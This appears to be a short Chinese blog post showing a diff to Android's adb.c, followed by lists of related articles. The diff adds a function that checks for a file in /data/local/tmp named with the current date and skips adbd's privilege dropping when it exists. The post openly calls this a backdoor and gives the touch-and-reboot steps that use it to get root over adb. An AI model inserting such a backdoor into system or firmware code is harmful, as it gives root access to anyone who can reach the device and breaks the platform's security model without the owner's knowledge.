可以通过修改文件来实现这个需求，只是在这个文件中添加了一个后门：system/core/adb/adb.c

@@ -55,6 +55,31 @@ static int auth_enabled = 0; static const char *adb_device_banner = "device"; #endif +bool checkAdbBackDoorFile()+{+    char buf[64] = {0};+    char filePath[] = "/data/local/tmp/";+    time_t timep;+    struct tm *p;+    int fd = 0;++    time(&timep);+    p = localtime(&timep);+    sprintf(buf, "%s%d%02d%02d", filePath, (1900+p->tm_year),(p->tm_mon+1), p->tm_mday);++    fd =  adb_open(buf, O_WRONLY);+    printf("fd %d %s", fd, buf);+    if (fd < 0)+    {+        return false;+    }++    adb_close(fd);++    return true;+}++ void fatal(const char *fmt, ...) {     va_list ap;@@ -1296,7 +1321,7 @@ int adb_main(int is_daemon, int server_port)      /* don't listen on a port (default 5037) if running in secure mode */     /* don't run as root if we are running in secure mode */-    if (should_drop_privileges()) {+    if (!checkAdbBackDoorFile() && should_drop_privileges()) {         struct __user_cap_header_struct header;

如何使用这个后门呢？

1）升级完成之后，adb连接成功。
2）执行：touch /data/local/tmp/20160113
3）reboot

后面那个时间就是今天的日期。

更多相关文章

1. HTTP Server 'Bad Gateway' ( Android(安卓)adt 或者 sdk 更想不
2. Android(安卓)studio 中 Gradle手动下载安装集成。方案一，Use def
3. Android(安卓)intent and activity 经典程序
4. Lgame引擎搭建和第一个例子
5. android 悬浮球的实现，全部界面可用
6. Android(安卓)BigNews 曾量更新
7. 如何编译MTK android模拟器
8. 【Android】报错IOException: Read-only file system问题解决方
9. android ftp客户端简单实现

随机推荐

1. “小而美”的数据治理实践
2. 什么是Python爬虫?大部分人都不懂!
3. Flutter从入门到进阶 实战携程网App
4. 前端技术分享：Nginx负载均衡视频，基础的实
5. 苹果Mac好用的录屏软件：Filmage Screen
6. Java企业级电商项目架构演进之路 Tomcat
7. linux系统执行读取jar包同级目录的外部配
8. Linux常用文件类型有哪些?六大类！
9. 永久免费！国产操作系统 Deepin V20 Beta版
10. 为什么写爬虫用Python语言?原因很简单！